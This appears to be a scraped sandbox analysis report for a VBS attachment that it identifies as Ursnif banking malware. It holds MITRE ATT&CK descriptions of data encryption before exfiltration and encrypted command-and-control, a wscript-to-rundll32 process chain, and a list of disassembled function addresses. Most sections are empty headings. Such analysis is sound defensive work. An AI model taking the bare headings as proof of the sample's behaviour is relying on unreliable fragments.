Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Attachment_32954.vbs

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: wscript.exe PID: 5540 Parent PID: 3388

General

Chronological Activities

Analysis Process: rundll32.exe PID: 6488 Parent PID: 5540

General

Chronological Activities

Analysis Process: rundll32.exe PID: 4072 Parent PID: 6488

General

Chronological Activities

Function 00DC3512, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Function 7025116D, Relevance: 24.1, APIs: 16, Instructions: 126
threadsleepsynchronizationCOMMON

Function 00DCA12A, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Function 00DC11A9, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 7025161B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 702515D9, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00DC37CA, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Function 00DC77EB, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191
memoryCOMMON

Function 70251470, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 00DC12E8, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 702512D5, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Function 00DC9FC0, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 70251B9E, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Function 00DC8714, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Function 70251A07, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 70251000, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 70251E8A, Relevance: 6.1, APIs: 4, Instructions: 61
stringthreadCOMMON

Function 70251F74, Relevance: 4.6, APIs: 3, Instructions: 69
memoryCOMMON

Function 00DC5311, Relevance: 4.6, APIs: 3, Instructions: 57
memoryCOMMON

Function 00DC76D6, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Function 00DCA5D1, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 70252020, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Function 702516C3, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Function 00DC31DD, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Function 70251756, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Function 7025111B, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 00DC28E9, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Function 00DCB159, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Function 702523C5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON